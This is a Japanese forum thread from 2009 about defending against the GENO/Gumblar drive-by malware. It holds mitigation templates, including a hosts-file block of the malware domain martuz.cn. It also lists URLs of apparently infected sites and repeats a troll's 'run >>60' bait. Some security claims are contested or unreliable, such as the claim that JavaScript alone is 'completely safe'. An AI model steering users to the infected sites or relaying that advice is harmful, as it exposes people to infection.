サイト管理者に連絡してあげたらいいのに
何がしたいんだ

ま、まさか 釣り とか

■ adobe javascriptをオフに
　 adobe readerを開いて　メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す

↑これは英語版ではどこをどう選んだらいいのでしょうか？
adobe reader9入れてから日本語パッチあてたり出来るんでしょうか？

日本語版入れなおしました
adobe javascript=acrobat javascriptでおｋなのでしょうか？
adobe javascriptなる項目が存在せずacrobat javascriptというのがあるのですが

自己りますた

>>201
こうゆうヤツが普通にいるからネットは免許制＆過失罪制度が必要なんだよ
自分の利便性最優先とか、どんだけ非社会的なんだよ

yabeeeesqlsodbc.chmが0byteになってた
ちゃんと最新のに変えてjavaも切ってたのに何でだ

0byte化報告は前にもみたな
genoっていうか、別物に感染したんじゃないか？

acrobatやflashの脆弱性を付いてクラッシュさせることで初めてパスなんかを盗むウィルスなんだから
JAVAスクリプトがONかOFFかはあんまり関係なさそうだな

>>216
クラッシュはsniffing動作と関係ないだろ。

クラッシュさせるサイトにとばすのに
js使ってるんでないの？
だからFireFoxのリンク先の画像先読みする機能を
オフにする話が出ると思った

修正案
■ adobe readerを9.1.0にアップデートする
とりあえず最新版にしましょう。

■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ adobe javascriptをオフに
　 adobe readerを開いて　メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
　 FirefoxにてNoscriptを利用
　 (Operaでflashオフでもおｋ([F12]を押す→[プラグインを有効にする]のチェックを外す)
　 (sleipnir、IEでも上手に設定するとなんとかなります)
■ hostsファイル書き換え
　 hostsファイルに以下の行を追加
　 127.0.0.1 martuz.cn
　 hostsファイルの在処
　 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
　 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
　 Windows 95/98/MEの場合→「C:\Windows」

動画サイトは見ない方が良いのか

対策してればどんどんみれ

Noscriptでｊｓを一時的に許可にしないと動画見れないし

■ hostsファイル書き換え
はいらんなmartuzはしんでる
感染するなら他のアドレスだしそれの予測は困難
この書き換えでブロックしようってのは現実的じゃない

むしろ、新しい感染先が分かったら
その都度どんどん書き加えていけばと思う

QTにも脆弱性見つかってるから近い内導入される悪寒

新マルウエア「ＧＥＮＯウイルス」蔓延に注意（1/3ページ）
ttp://www.asahi.com/digital/digitre/TKY200905250299.html

まともな文章だが

ウィルスではなく、ウイルスなのは知ってるが、マルウェアがマルウエアだとは知らなかったなｗｗｗ

所詮英語だからどう書こうがいい

>>231
ウィルスは英語読みじゃないぞ。

ビールスしかみとめません

小さいィェォは大きく書くこと多い
ウィルス→ウイルス
フィルム→フイルム
トェェェェイ→トエエエエイ

ヴァイラスで

新しい感染先は
netstatでわかんねーかな
セッション貼られてるの一瞬かなー

http://search.yahoo.co.jp/search?p=http%3A%2F%2Fharu0425.h.fc2.com%2F&ei=UTF-8&fr=moz2&rls=org.mozilla:ja-JP:official
この検索で出るサイト、トップ頁以外１０００％だな。ソースも確認したが、黒。

結構有名なエロ小説サイトだからヤバイと思うわ。エロ小説サイトめぐりが趣味な人は気をつけろ。

adobe javascriptはadobe readerを9.1.1にはないから...

無理せずに英語で書いていいぞ

>>239
いやああ〜〜〜

sqlsodbc.chmが0byteになってたんでハッシュ値を確認しようと思ったらファイル自体が破損してるのか確認すら出来なかった
Windows Updateにも繋がるしアンチウィルスもしっかり更新できる、cmdもregeditも立ち上がるし、そもそもadobe関連は全部最新のものに変えているしjavaは切ってある
一応カスペとNODとavastで別種のウィルスかと検索してみたがgenoは元よりナニも検出されない
一体なんだったんだろう　おしえておじいさん

Java≠JavaScript

JavaとJavaScriptを混同してる奴を見ると、鼻の穴にパチンコ玉を突っ込んで
やりたくなるよな。それも両方の穴に3つずつ、奥までみっちり詰め込んで
やりたい。

>>243
いいから次スレはテンプレ修正しとけってｗ

そこまでやって、hostsファイルの改ざんだけは
頑なに調べないのは何でだろう

>>204
危ないから運営に通報しといたよ

困った時は>>60
事前予防は>>60

キチガイが起きてきたみたいだな

※＞60は実行しないでください。

病気にかからない方法の一つ
・あらかじめ死んでおく
ってことかなｗ

2ヶ月前amzonに注文したブツが一昨日か昨日が配送予定日になってるのに
確認メールが来なかった忘れてるのだろうか・・それとももしや・・

>>251
私がおいしく頂きました。

amazonは問題ないが、、ほしいものリストは罠なので気をつけるように

１修正案

■ adobe readerを9.1.0にアップデートする
ttp://get.adobe.com/jp/reader/
　とりあえず最新版にしましょう。
　インストール後本体をアップデートしておく事
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ adobe javascriptをオフに
　 adobe readerを開いて　メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
　 FirefoxにてNoscriptを利用
　 (Operaでflashオフでもおｋ([F12]を押す→[プラグインを有効にする]のチェックを外す)
　 (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
　 hostsファイルに以下の行を追加
　 127.0.0.1 martuz.cn
　 hostsファイルの在処
　 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
　 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
　 Windows 95/98/MEの場合→「C:\Windows」
これで900程度で次立てる
チェッカーはアフィとか以前に嘘を直すまでは外す
（readerのバージョン、フラッシュのリンク）
>>6

>>254
ＧＪ。賛同です。

>>2の確認方法じゃ危険なの？

>>254
adobe javascript→acrobat javascript

最近、楽天にしか登録してないメールアドレスにスパムが届くという話があるが
GENOウィルスが騒がれだしたのは楽天にショップがある所からだよね？
メールアドレスも抜き出すんじゃないのコレ？

いつのスレかは忘れたが、不発のときに、コマンドの起動がトリガーになり得る
という話はあった。確認方法は>>3が確実なら、それで十分なのでは。

結局genoウイルスチェッカーは信頼できないんか

cmd、regeditでトリガーって
もう既に不発じゃないいんじゃない

１００％で確実じゃないとか頭おかしいでしょ

>>254
Adobe Readerの最新版は9.1.1だろ。

>>6
9.1.0でGENOの対処は終わってます
最新版は将来変わるので
バージョンは書かないで最新版にあげろとだけで

>>264
adobe javascript→acrobat javascriptにいい加減書き換えろボケ

hostsに追加おまけリスト（127.0.0.1 martuz.cnも入ってるよん）
ttp://www1.axfc.net/uploader/Sc/so/5031.zip
DL：GENO

１修正案

■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
　とりあえず最新版にしましょう。
　インストール後本体をアップデートしておく事
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
　 adobe readerを開いて　メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
　 FirefoxにてNoscriptを利用
　 (Operaでflashオフでもおｋ([F12]を押す→[プラグインを有効にする]のチェックを外す)
　 (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
　 hostsファイルに以下の行を追加
　 127.0.0.1 martuz.cn
　 hostsファイルの在処
　 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
　 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
　 Windows 95/98/MEの場合→「C:\Windows」
これで900程度で次立てる
チェッカーはアフィとか以前に嘘を直すまでは外す
（readerのバージョン、フラッシュのリンク）
>>6

>>263
だね　手動でupdateしないと9.1.1にならないよね

>>254,>>267
9.1.0になるのでアップデートかけて9.1.1にしろと書いとけよ ＞ Reader

9.1.0でGENOの対処は終わってます

>>270
終わってないぜ。9.1.1にしないと無意味。

終わってる
まとめでなんでこんなデマ書いてんだか

どっちだ？最新は9.1.1なんだから、それでいいじゃん

15 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/23(土) 04:04:44
ttp://www.ipa.go.jp/security/ciadr/vul/20090311-adobe.html
このバグなら 9.1.0で修正済み
9.1.0では駄目ってのはどっからでてきたわけ

16 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/23(土) 04:09:49
genoが突いてくるセキュリティホールは9.1.0で直ってるよ
9.1.1は別のセキュリティホール

１修正案

■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
　とりあえず最新版にしましょう。
　インストール後本体をアップデートしておく事
　adobe readerを開いて　ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
　 adobe readerを開いて　メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
　 FirefoxにてNoscriptを利用
　 (Operaでflashオフでもおｋ([F12]を押す→[プラグインを有効にする]のチェックを外す)
　 (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
　 hostsファイルに以下の行を追加
　 127.0.0.1 martuz.cn
　 hostsファイルの在処
　 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
　 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
　 Windows 95/98/MEの場合→「C:\Windows」

どこまでGENOというかだが
9.1.0にある脆弱性ついたのまだないのかな
とりあえず最新版にしとけでいい
バージョン表記はいらん

同感

>>275
おつかれさまでした

Adobe製品なぞ全削除推奨

PDFは妥協するとしてFlashはさすがに無理無理

１修正案

■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
　とりあえず最新版にしましょう。
　インストール後本体をアップデートしておく事
　adobe readerを開いて　ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
　 adobe readerを開いて　メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
　 FirefoxにてNoscriptを利用
　 (Operaでflashオフでもおｋ([F12]を押す→[プラグインを有効にする]のチェックを外す)
　 (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
　 hostsファイルに以下の行を追加
　 127.0.0.1 martuz.cn
　 hostsファイルの在処
　 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
　 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
　 Windows 95/98/MEの場合→「C:\Windows」

hostsに追加おまけリスト（127.0.0.1 martuz.cnも入ってるよん）
ttp://www1.axfc.net/uploader/Sc/so/5031.zip
DL：GENO

追加＞60

shine

>>276
それだと自称最新版ちゃんが出てきちゃうから
バージョン表記は必要だとおもうよ

9.1.1が最新だーよ

そうあるよ

http://www.jsports.co.jp/notice/notice_0529.html

>>284
＞インストール後本体をアップデートしておく事
＞adobe readerを開いて　ヘルプ→アップデートの有無をチェック

↑がテンプレ修正案に入ってるからバージョン表記は無くていいよ。

また特定のサイトにアクセスできなくなった昨日再インスコしたばっかりなのに

>>289
>>60を実行するんだ

Adobe Readerはインストール時にReader SpeedUpで
広告からスクリプト関連まですべて削除しとくといい。
あとで必要になったらデフォルト状態にすぐに戻せるし
起動も読み込みも爆速になる

9系は起動遅くないような

>>254
adobe readerの最新版入れたはずなんですが9.1.1になってるのっておかしいですか

マトリックスゴイ

あああすみませんレス読んだらちゃんと最新版ってありました

＞Vistaの人はは

コレなんで直さないの

母

>>296
文章の検討が十分でないことを意識してもらい、
気を緩めず、緊張感を持って読んでもらうため

チェッカーの人は一応まだ生きてたんだなｗ
微妙に記述が変わってる

>>296
りすぺくつですよ

しつこくテンプレやってたのはアフィチェッカーの奴なのか

検出できるの今avastだけなの？

次スレ立てる人テンプレだけでもトリつけて４辺りにレジストリ改変させようとする
キチガイが常駐してることも書いといたほうがいいかも

GENOウイルスチェッカーも個人的にはウイルと同等
アフィ野郎は死ね

ウイル

>>301
それを知る為にもテンプレ書く奴はトリつけて欲しいよな

テンプレでチェッカー外そうとしてるのに
アフィチェッカーの奴なわけない

そろそろアフィチェッカーはテンプレから外すべきだな
で、身元割れ
なにしれーっとアフィ仕込んでやがる

前スレで外したのにわざわざ復活さしたからな

復活さした

チェッカーの中の人もアンチ（っていうかアフィ厨）も必死

どうやら、このスレには海外の方が多いみたい

とにかくせめてフラッシュの記述だけは修正しないと
これで大丈夫だと思って引っかかるIEの奴がいるだろ
アフィチェッカいい加減直せよ

PCJ○PANに対策が載っていたけど、目新しい事は載っていなかった。まとめに書いてあることとだいたい同じ。

googleだと「コンピュータに損害を与える可能性がある」と表示してくれるけど
Yahooは何も表示されないから怖くて使えない

現verのノートンにnortonセーフウェブなる保護機能（検索エンジン結果の拡張対応）が付いてるが
あれは使い物になるのか？
有効にしていると常時、ノートン鯖にアクセスするから重くなるだけのような気がするんだが

少しはね

>>316
気休め程度
たぶんリストはローカルに持ってるとおもう

>>196
Vista UAC回避が明記されてるexploitツールも見かけた

※
Adobe Readerに関してはバックグラウンドDLも無効にする

ネットをやめれば万事解決

>>319
Macおすすめ

ウィルス如きが怖いようならPCは使わない事だ

404、403エラーページに仕込まれ始めたって話ホント？

どんどん脈絡なくウイルス全般の話して不安を煽るやつがおるのか

>>323
それマジソース
どうせカスタムエラーページだと思うけども

>>325

ttp://questionbox.jp.msn.com/qa4998383.html?ans_count_asc=2
>なお、これはサーバーの出す404エラー表示にも仕込まれておりましたので、
>管理者権限にてWEBルートより上位ディレクトリのｃｆファイルが書き換えられた可能性があります。

カスタム可能サーバなのかな？

追記です
話題になってるのはこのサイトみたい

h●●p://www.mutsumi-house.com/aindex.html

うわあ…

404だしてもGenoみあたらないんだが

>>329
ちゃんと上で指定されてるサーバーいったか？

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /aindex.htmleee was not found on this server.</p>
</body></html>

例のGENOチェッカーサイトはamazonnアソシエイトに通報すれば普通に処罰されるよ

てかなんでお前ら通報しないの？死ねよ

>>329
ttp://www1.atchs.jp/test/read.cgi/gegegeno/1/764-764

>>332
自分でやれよ

>>334
たった一言なのにすごく説得力あるなｗ

asahi.com（朝日新聞社）

新マルウエア「ＧＥＮＯウイルス」蔓延に注意（1/3ページ）
ttp://www.asahi.com/digital/digitre/TKY200905250299.html

>>332
え　アソシエイト　が仕込まれてるの？
知らずにやってた・・・

>>337
>>7

アクセス数がかなり多く、サーバー維持が大変です。
差し支えなければ下記アフィリエイトリンクのご利用よろしくお願いします。

>>337
geno2chtc-22

-22って付いてるところがアフィの元。
geno2chtcね。

■ adobe flashplayerを最新版に更新
　 http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
だけではIEのｆlash更新されません
当サイトを見るだけで十分とか書いておきながら
一番大事な所で嘘書いてるクソサイト

iframeってサイトみただけでクリックしたことになるんですよね？

>>332
何か規約に反したことしてるのか？

暇だからAmazonに通報してみるか

>>342
サイトみたときに同時に読み込まれるけど
クリックはしないとおもう

http://geno.2ch.tc/
は
GENOウイルスチェッカー
危険度4%

>>344
どんな規約に違反してるの？
そもそもアマゾンって踏んだ後に購入しないと金が入らない仕組みじゃなかったっけ？

>>344
頼んだ。期待している

■ adobe flashplayerを最新版に更新
　 http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
だけではIEのｆlash更新されません
当サイトを見るだけで十分とか書いておきながら
一番大事な所でデタラメ書いてるクソサイト

ASAHIネットのユーザーサイトでスクリプト埋め込みを
確認したんだけどASAHIネットの通報先がイマイチわからん

eval unescapeでぐぐってたら出てきた
gumblar2.5個(1つできそこない)、martuz1つ確認
www●ne●jp/asahi/travel/net/sub5.html

>>350
whoisでは
remarks: Email address for spam or abuse complaints : mailto:[email protected]
ってなってるけど、このアドレス死んでるの？

こんなスレまだあったんだｗ

ニートはアフィとか嫌いだよな
世界はタダで俺に奉仕しろってキチガイすぎるぜ

アフィ嫌いじゃないよ
おれ自身アフィのおかげで助かってる身だし

今頃騒いでる奴は馬鹿。

アフィはあっても無くてもどっちでもいいだろ
問題は中身

>>350
おｋ、サーバー管理者宛に送っとくよ

>>350-351
朝日ネットの技術連絡担当者のメールアドレスに送っといた。

>>356
叩きたいだけの能なし基地外にそんな正論言っても無駄
チェッカー使わないから別にいいけどね

>>357-358
ｔｈｘ

アフィ云々より運用板での発言が気になる
アフィなんかどこでもしてるし別に問題ない

日本語通じない人に何言っても駄目っす
ID出ないから自演しまくりだし

GENO関連なので、こちらに誘導されてきました。

GENOウイルスにかかって
パソコンをリカバリしてからちょっとおかしい？ので
質問させてください。

ウインドウズXPで、機種はレッツノートです。

ローカルディスク（C)の中身って、
普通、
Documents and Settings
Program Files
util
WINDOWS
くらいですよね？

それ以外に、なんか長い英数字の並んだ名前のフォルダが存在するのって
おかしいですか？
5558de〜とかって30文字くらいのフォルダ名です。
多分前はそんなフォルダなかったと思うんですが…。
ウイルスの駆除がまだできてなかったってことでしょうか？

■ adobe flashplayerを最新版に更新
　 http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
だけではIEのｆlash更新されません
当サイトを見るだけで十分とか書いておきながら
一番大事な所でデタラメ書いてるクソサイト
こいつのせいで蔓延してんだろ

ようやく修正したなｗｗ

■ Opera(→ダウンロード)でプラグイン、Javaをオフ。(JavaScriptのみでは全く安全です。)
こいつ技術者じゃないんでないの
あまりに短絡的

これ、どういう基準でチェックしてんの？？？
javascriptの数が基準？

おれんとこの富士通のttp://azby.nifty.com/
101パーセント危険判定されてわろた。
んで、ttp://azby.nifty.com/light/にしたら一挙に８パーセントで安全になったんだけどｗ

他では笑いのネタになってるぞこれｗ

>>363
OSアップデート時のごみが残ってるだけだとおもう

>>363
そんなもん腐るほどあるわ！

GENOチェッカーにある
■ adobe flashplayerを最新版に更新

　 IE用のアップデーターです。↓も必ずインストールしてください。 05/30更新 重要！
　 fpdownload.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_10_active_x.exe

この下のexeは更新して大丈夫だよね？
なんかexeが直リンされてると怖い

>>370
ttp://www.adobe.com/go/getflashplayer_jpは？

>>363
一応フォルダの中身きいとこうか

あのサイト見るな
不十分サイト
１修正案
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
　とりあえず最新版にしましょう。
　インストール後本体をアップデートしておく事
　adobe readerを開いて　ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
　 adobe readerを開いて　メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
　 FirefoxにてNoscriptを利用
　 (Operaでflashオフでもおｋ([F12]を押す→[プラグインを有効にする]のチェックを外す)
　 (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
　 hostsファイルに以下の行を追加
　 127.0.0.1 martuz.cn
　 hostsファイルの在処
　 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
　 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
　 Windows 95/98/MEの場合→「C:\Windows」

１００％で安全とか頭おかしいでしょ
普通は修正する

とにかく次スレで外す

皆様返答ありがとうございます。
大丈夫そうということで、とりあえず安心しました。
どうもありがとうございました。

>>372
フォルダの中身はsupportとかupdateというフォルダと、
他本当にファイルがいっぱいで書ききれないです…。

>>363
それは、WindowsUpdate等の作ったファイルなので消しちゃだめ。

>>370
IEだとめんどくさい処理がいるからそのリンクでいいよ

■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

>>376
自分の知ってる限りだと
winupdate関連以外にもcreativeのサウンドカード（わけのわからないファイルがsystemにくいこむ）や一部のソフトの履歴としても
似たようなものが作られる事があるよ

チェッカー叩きってなぜか集団で来て集団で去っていくね
よっぽど離れてても心が一致団結した人たちなんだね

叩きってねえ
成長しろよいつまでフラッシュのver嘘書くの

自演

なにをいまさら
つうか全部おれの自演

うお。チェッカー修正キタ
ありがてえ

flashの記述はましになってよかったね
叩きのおかげか

感染してるとWindows Updateに接続できないって事は
言い換えると接続できれば感染してないってことなのでしょうか

そうかもしれないしそうじゃないかもしれない
ウイルス全般に言えるような話は他でやってね

>特に2ちゃんねるで様々な情報が錯綜していますが、異常に警戒する必要はありません。
>今回の件に関してはこのサイトに従って対策を施せば、大事に至ることはまずないでしょう。
>wiki、2ちゃんねるの情報は、誰でも書き込みできてしまうので、信憑性に欠き、初心者の方は惑わされやすいです。
>そこで、情報の取捨選択に困ってる人のために当サイトを見るだけで十分なようにこのサイトは作られました。

嘘情報ずっと載せてた危険サイトの癖に

チェック先のソースを表示して、
感染部分を赤字で教えてくれる他のチェッカーの方が断然使いやすかった。

>>379
おい更新できねーじゃねーか糞が
IEが更新中止しやがる

感染サイトを確実に見極めるにはGENOチェッカーでは役不足ですね
私は独自の対策より99.999%、感染か未感染か確かめられるのでその方法でサイト検証はしました
今後、変異したGENOウイルスが出たとしても99.999%防御できるだろうと確信しています

>>392
急にどうしたんだ？

チェッカー、0.4%とか更に細かくなってるんだが気のせいかｗ？

ブラウザは用途に応じてIE/firefox/operaで使い分けるのが最強だな
〜だから駄目って事はない

自演が痛すぐる

IDない板で何言っても見苦しい事になるだけ

>>393
なぜなら彼もまた特別な存在だからです。

>>1-1000
全て俺の自演（の予定）

>>393
GENOチェッカーは曖昧な表現のため慎重派は0%以外を危険とみなしてしまうので使い勝手が悪いのです
ウイルス検出ソフトで例えると「誤検出」した状態と同じです

GENOチェッカーも、感染しているか、否かを判断できるなら使えるのですがとても残念です

>>400
良いこと言った

突然クソ重くなったんで感染したか！？と思ったら
noscriptが重かっただけだったでござる

■ Opera(→ダウンロード)でプラグイン、Javaをオフ。(JavaScriptのみでは全く安全です。)5/30更新
　 1.[F12]を押す→[プラグインを有効にする]のチェックを外す。
　 2.[F12]を押す→[javaを有効にする]のチェックを外す。
　　sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。
　　この方法だと多くのサイトで利用されているJavaScriptを犠牲にせず、簡単に安全なブラウジングが実現できます。

これってどういう事なんだろう
javascriptって危険なんじゃなかったっけ？

ただのインチキ情報だろ

>>402
火狐は相変わらずメモリリーク問題がある

>>403
全く安全
多くのウイルスがJavaScriptを介して、pdf、swf等を読み込ませるからJavaScriptが問題だと勘違いされがちですが、
javascript単体にはローカルファイル操作、レジストリ改変等を行う機能は存在しません
よってその対処法を導入していれば持続的な被害に合うことは一切ありません




>>404
雑魚は黙ってなさい

Javaなんてインストールされてないだろ
そんなんで安全ならこんなに問題になんてならない

Adobe Flash Player のバージョンテスト（最新10,0,22,87）
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

Javaは関係ないだろ？
そんなことよりAdobe製品の対策しとけば問題ないだろ

Javaの脆弱性が突かれたって言うのか
全然Sunは対応してないようだが

>>406
Sunに報告してね

>>406
まじでjavaの脆弱性なら報告してくれよ
間違いなら迷惑だから訂正して欲しい

それopera関係ないワナ

operaもjavaも関係ない

ウソクソ情報垂れ流してまじいいかげんにしてほしい

50,727じゃなかったんだけど…おわ……た

　　/￣￣￣ / 　/''７ ./''７　　　　　　　　/￣/　 /''７
　./ ./￣/　/　　/__/ /　/ 　＿＿＿_　　 ￣　　/　/
　'ー'　_/　/ 　 ＿__ノ　/　 /＿_＿＿/ 　 ＿__ノ　/
　　　/___ノ 　 /＿___,.／　　　　　　　　 /＿___,.／

　　　_ノ￣/　/￣/　 /''７　/￣￣￣/　　　/￣/　　　　　　　　　　　 　/'''７'''７
/￣　　／　　 ￣　　/　/ 　 ￣ ﾌ　./　　　/　　ﾞー-; 　 ＿＿＿_　　　/　/　/.＿
￣/　/　　 　 ＿__ノ　/　 　__／　 (___　　/　 /ｰ--'ﾞ　/＿_＿＿/　_ノ　/i　 i/ ./
　/__/　　　/＿___,.／　　 /___,.ノゝ＿/　/＿/　　　　　　　　　　　/__,／　ゝ､__/

yahoo!JAPANトップページのニュース･･･
国交省岐阜国道事務所が感染してたのってもしかしてGENO？

もしかしてGENO？

システムフォルダ内のファイルやレジストリを書き換えるのかな
ならOutpostとかComodoあたりでも防げそうだね
その他大概のHIPSで防げそうだけど

もしかして恋？

>>406
チェッカーのサイトの人か
修正しとけよ
JavaとJavaScript混同するなよ
雑魚は雑魚なりにがんばれ

このスレ見てんなら間違ってるところ他にもあるから直せばいいのに
意地になってるのか

チェッカー使えねえなｗｗｗｗ

終焉。

今回悪用されたAdobeの既知の脆弱性はRemote Exec Vulnだと思うけど、
Comodo Internet Securityにおいてバッファオーバーフローが発生した時点で
ブロックできることを確認したよ

COMODO伝説

バスターばかにすんな

m9(^Д^)

ttp://www.yomiuri.co.jp/national/news/20090530-OYT1T00433.htm
厚労・国交省、公式サイトのハッカー攻撃を長期間放置

>>430
岐阜国道事務所の件までハッカーによる改ざんであるかのような記事だな
クソだな

こういう鯖ってUNIXだっけ？
まさかWINって事は無いよな。

どっかのオンラインゲームで、Windowsを鯖に使ってますって公言してるのを見て笑った覚えがある。

>>370
落としたら正規のプログラムみたいだったぞ
え？それでやったけど危ないの？

危なくないよ
糞サイトだからあんまり信じないのが良いだけ

exe恐怖症の人は、↓で
ttp://www.adobe.com/go/getflashplayer_jp
しかし、公式のexeリンクくらいは信頼しないと何も出来なくなるぞｗ

>>435
レスありがとう
安心した

ｇｕｍｂｌａｒ。ｃｎは5/18に停止、ｍａｒｔｕｚ。ｃｎも5/19に停止している
みたいだけど、最近感染した人はどこに誘導されてるんだろう？

もっと前から感染してたのを最近になって気づいたってだけじゃね

script error line 86 position 3が出るようになったけど
これはacrobat javascript関連でOKでしょうか？

此処に書き込む感染した奴ら
確実にもう２，３個トロイ入れられトル

そっかー

バスターばかにすんな

>>213
だったらやさしく教えてやれ

>>439
そういうドラマチックな展開が好みか
現実にはありえないがね

flashとリーダー
最新に更新しとけばいいで終了
亜種だ、別種だ？そんなのどうとでもいえるわい

「Vistaの人ははUAC」が気になって夜も眠れません！！
ここは修正しないんですか？

グーグルの検索結果一覧に各HPに入らない方がいいサイトには紫、大丈夫なのは緑が付いてたけど
先読み機能切ったりテンプレの対策したら色付かなくなったんですがそういうものですか。
それともウイルスが原因？

>>359
叩いてるｗ

だれかおせーて

日本語で書けカス

>>406
皆少しはこの人を見習ってほしい

はいはい

>>436
ありがとう

･ﾟ･(つд∩)･ﾟ･

247 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/29(金) 14:49:42
困った時は>>60
事前予防は>>60

こいつ通報してくる

ウィルス直リンをマルチしてるならともかく、その程度は通報しても無駄

>>457
そうか
ならやめとくわ

>>452
おいおい
人を貶してる上に間違ってるだろ

チェッカーの人お疲れ。
ありがとう、助かってるよー

>>448誰か教えてください。

(´・ω・`)

>>448
自分の環境では色付いてないかさっぱりらわからん。

ないから さっぱり わからん。

さっぱり を強調したかった気持ちを汲み取ってくれ。

念のためFlash Playerをダウンロードしてインストールしたけど、バージョンが10.0.22.87で
2月末のから変わってないじゃん。
もしかしてチェッカーの人にだまされてる？

最新verは、10.0.22.87で合っている

>>440
86行目に何が書いてあるの？

対応済
Flash Player 9.0.159.0 10.0.22.87
Adobe Reader 7.1.1 8.1.4 9.1.0

最新
Flash Player 10.0.22.87
Adobe Reader 9.1.1

元々、Flash Playerの方は問題なかったって事でそ

>>361
運用板での発言ってなに

Adobe Readerの対策版が出たのが3月19日

運用板は知らんがこのスレの発言見て叩かれるのも納得

・wiki、2ちゃんねるの情報は、誰でも書き込みできてしまうので、信憑性に欠き、初心者の方は惑わされやすいです。
お前のサイトはお前しか更新できないから信用できねえんだよｗｗ

>>473

信用できねえんだよｗｗ ← 負け犬特有の悲壮感漂う(ry

勝った人おつかれさまです

メール来た
＞継続して商品の調達に努めてまいりますが、調達不能な場合または入荷数
の関係上キャンセルをさせていただくこともございます。

2ヶ月前に予約したのにブツが無いってどういうことなの・・

バスターが気に食わないならアフィリンク外せっての
性格が悪いな

しかしチェッカーの人も忙しいな
ずっと書き込みしてるのか
そんな暇あったら間違い直せよ

昨日もこのスレに１00レスは書いた。
今日は200レスは書いてさっさと新スレ立てよう

windows updateで何かそれらしいのに対応しました何ちゃらみたいなのがあった

>>456は>>60を実行したんだなｗ

そんなものはない

GENOチェッカーお気に入りから外すわｗ
もとから信用してないけどｗ

>>467
わからないですねん
script error line 86でぐぐったけどヒットしなかた

何の恨みがあるんだか

だからなにをどうした時に出るどれのエラーだよ

クソサイトみて安心だと思ってたらIEで感染してエロ貯蓄がパーの人でしょ

>>486
なんか２ｃｈ5時間くらいして疲れて寝てしまって
気が付いたら出てたえらーです(｀･ω･´)

>>488
履歴をたどってみ

>>488
スクリプトエラーでぐぐるといいかも

おいおい何だよこの過疎っぷりは
結局一人が自演してただけなのね


哀れだなｗｗ

>>491
感染してるぞおいｗｗｗｗｗｗｗｗ
＞60を実行するんだｗｗｗｗｗ

>>470
運用板見りゃいいじゃねーか
あいつのトリ検索したら発言出てくるだろ

>>493
自分で何とかしろキチガイ

幸せサーバープロジェクト　「アイデア・技術のある人募集中」★3
http://qb5.2ch.net/test/read.cgi/operate/1241361889/

いちいち他のスレの書き込みまで覗いて叩こうとするのはよくないと思う。
今は大人しいんだから放っておきなよ。

>>484
自分のサイトじゃないの？
エスパーじゃないんだから440自身が説明できない現象じゃ
どうしようもないよ

XcxlmnqGqU

運営スレであんだけファビョって
